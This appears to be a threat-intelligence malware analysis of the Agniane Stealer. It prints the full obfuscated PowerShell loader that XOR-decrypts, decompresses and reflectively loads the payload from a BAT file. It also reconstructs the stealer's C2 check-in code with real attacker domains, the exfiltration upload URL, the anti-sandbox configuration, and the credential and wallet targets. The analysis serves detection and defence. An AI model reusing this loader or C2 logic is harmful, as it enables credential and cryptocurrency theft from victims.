passbook.bat.exe -noprofile -windowstyle hidden -ep bypass -command $_CASH_esCqq = [System.IO.File]::(‘txeTllAdaeR'[-1..-11] -join ”)(‘C:\Users\user\AppData\Local\Temp\15\Rar$DIa63532.21112\passbook.bat’).Split([Environment]::NewLine);foreach ($_CASH_OjmGK in $_CASH_esCqq) { if ($_CASH_OjmGK.StartsWith(‘:: @’)) { $_CASH_ceCmX = $_CASH_OjmGK.Substring(4); break; }; };$_CASH_ceCmX = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ceCmX, ‘_CASH_’, ”);$_CASH_afghH = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)($_CASH_ceCmX);$_CASH_NtKXr = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)(‘ws33cUsroVN/EsxO1rOfY1zGajQKWVFEvpkHI/JP6Is=’);for ($i = 0; $i -le $_CASH_afghH.Length – 1; $i++) { $_CASH_afghH[$i] = ($_CASH_afghH[$i] -bxor $_CASH_NtKXr[$i % $_CASH_NtKXr.Length]); };$_CASH_DIacp = New-Object System.IO.MemoryStream(, $_CASH_afghH);$_CASH_yXEfg = New-Object System.IO.MemoryStream;$_CASH_QbnHO = New-Object System.IO.Compression.GZipStream($_CASH_DIacp, [IO.Compression.CompressionMode]::Decompress);$_CASH_QbnHO.CopyTo($_CASH_yXEfg);$_CASH_QbnHO.Dispose();$_CASH_DIacp.Dispose();$_CASH_yXEfg.Dispose();$_CASH_afghH = $_CASH_yXEfg.ToArray();$_CASH_hCnlS = [System.Reflection.Assembly]::(‘daoL'[-1..-4] -join ”)($_CASH_afghH);$_CASH_Xhonj = $_CASH_hCnlS.EntryPoint;$_CASH_Xhonj.Invoke($null, (, [string[]] (”)))

The command line shown above performs the following actions:

• Reads the content of the previously extracted BAT file (passbook.bat).
• Through string matches and replacements, builds the payload dynamically and assigns it to a variable.
• Converted payload and static key from Base64 to a byte array.
• XOR’d the payload using a static key.
• Decompressed XOR’d payload using GZIP.
• Invokes payload after reflectively loading it into memory.

To understand actions taken toward the objective, we reversed the payload.

Binary Analysis

The invoked payload continues with the execution of a C# assembly. We have dumped it into a file, where we get the executable with below hash,

5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df.

At time of the analysis, the file was unknown to online sandboxes. We have decided to emulate the activity on the Cisco Secure Malware Analytics sandbox with the generic settings on this file, which is the second stage of the deployment of the stealer. The dynamic analysis could not be completed as we did not execute the first stage of the sample of the malware. Therefore, we decided to analyze the sample manually, where we found later there are anti-sandbox techniques used.

The binary file was highly obfuscated with control flow manipulations, like ConfuserEx.

Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.

It is important to note that the sample did not contain a signature for ConfuserEx, yet it had an obfuscation method that resembled it.

After reversing the sample, we realized it contains another binary file in its resources section, which were getting reflectively loaded. The new binary was another C#-based sample, which contained the final payload. It was obfuscated with ConfuserEx with direct signatures.

Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.

The C# file calling Invoke function for in memory loading and executions, a common approach to reflective loading of resources files.

As you can see from the previous screenshot, it is calling Invoke functions from an entry Point object, which contains a parsed resource.

Loading resource data from malicious sample, which is later executed in the memory. The start of the execution is in the image above.

The entire loading process appears as though passbook.bat.exe is executing PowerShell, which is deobfuscating passbook.bat. This, in turn, is running the tmp385C.tmp (tmp385C.tmp is just a header file name) C# applications, which reflectively load the _CASH_78 C# application. The final application in this sequence is the Agniane Stealer:

Malware execution chain. _CASH_78 is the final payload. The previous steps were used only for obfuscations. There were multiple stages of sample to finally loading _CASH_78 app. _CASH_78 app is final malware, stages before are used only for delivery, obfuscations or detection evasion.

Command and Control

The Agniane Stealer operates in a straightforward yet efficient manner, stealing credentials and files from the endpoint using a basic C2 protocol. Initially, it verifies the availability of any domain names through a simple C# web request, checking if the return value is “13.” This time request was made to a URL labeled “test,” for instance.

WebClient wc = new WebClient();

urlData = wc.DownloadString(“https://trecube[.]com/test”);

If urlData == “13” {

list_of_active_c2.Add(“trecube[.]com”)

continue;

}

In our sample, we can see the following IOCs (indicators of compromise) presented in resources file:

trecube[.]com

trecube13[.]ru

imitato23[.]store

wood100home[.]ru

For all these domains, the sample is calling for a test URL.

urlList = {“https://trecube.com/“, “https://trecube13.ru/“, “https://imitato23.store/“, “https://wood100home.ru/“}

for domain in domainList:

{

WebClient wc = new WebClient();

urlData = wc.DownloadString(domain + “test”);

If urlData == “13” {

list_of_active_c2.Add(domain)

continue;

}

}

Later, the malware calls C2 to get a list of file extensions to look for. This is located at URL pattern getext?id= followed by an ID – a part of resources of the _CASH_78 file. On this website, the list of extensions is separated by a semicolon, and for example on a website trecube[.]store it looks like:

*.txt; *.doc; *.docx; *.wallet; *seed*

Again, this is handled as previous checking string in the code. It is parsed/split by semicolon and a list of extensions is created in a list of variables in C# code.

The Code handling via dynamic analysis, through which we identified the C2 URL as a breakpoint for DownloadString.

Subsequently, the malware requests a remote json file containing the details about errors, VirusTotal hits, etc. Based on this information, the sample either progresses or halts. We chose to focus our investigation on other aspects that are more directly relevant to attribution and detection settings. However, it is important to note that the URL pattern can be utilized for tracking malware through telemetry or online sandbox services for OSINT purposes. The URL looks like:

hxxps://trecube13[.]ru/getjson?id=67

And here what its corresponding output looks like:

{

“debug”: “0”,

“emulate”: “0”,

“virtualbox”: “1”,

“virustotal”: “0”,

“error”: “0”,

“errorname”: “NONE”,

“errortext”: “NONE”

“competitor”: “0”

}

The next stage involves enumeration and collection. It scans the computer to collect all documents with specified extensions instructed by the URL with a “getext” pattern, along with other credentials found in common paths of the operating system, such as Mozilla Firefox storage, Chrome storage and saved Windows credentials. This is a common activity amongst information stealer malware. Additionally, Agniane was checking to see the localization setting of the victim computer. If it contains any of the language packages below, it does not proceed with the infection,

ru-RU

kk-KZ

ro-MD

uz-UZ

be-BY

az-Latn-AZ

hy-AM

ky-KG

tg-Cyrl-TJ

The allowlisting of some regions can also mean the developer does not want to attack specific regions. Based on other observations it is possible to expect the attacker is from a country with a strong diplomatic tie to Russia.

Once all the target files are collected, the malware creates a ZIP archive under the “local application data” folder,

C:\Users\[user]\AppData\Local\[A-Z0-9]{32}

Below is the structure/content of this archive file

Agniane Stealer.txt //added as attachement here

Installe Apps.txt //added as attachement here

PC Information.txt //added as attachement here

Files from Desktop //FOLDER – contains exfiltrated files from Desktop folder

Files from … //FOLDER – contains exfiltrated files from …

… //and other folders, which contain exfiltrated files.

It is later uploaded to

https://trecube[.]com/gate?id=67&build=BAT&passwords=0&cookies=124&username=johnny&country=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0

Below you can find the illustrated version of the Agniane Stealer’s C2 communication,

The C2 communication protocol.

Other TTPs

The Agniane Stealer was also seen performing following actions:

• Enumerating registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall for installed applications, it also collects this information.
• Checking for a public IP on a ip-api.com, i.e, https://ip-api.com/json/?fields=11827
• Dumping Bitcoin and other cryptocurrency wallets
• Performing (not well) checks to see if it’s running in a debugged or virtual env. etc.
• Collecting wallet.dat files.
• Enumerating Profile and User data.
• Collecting stored credit cards.
• Adding other malware like NGenTask.exe.log (the file with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3).

Source: cisco.com

Continue reading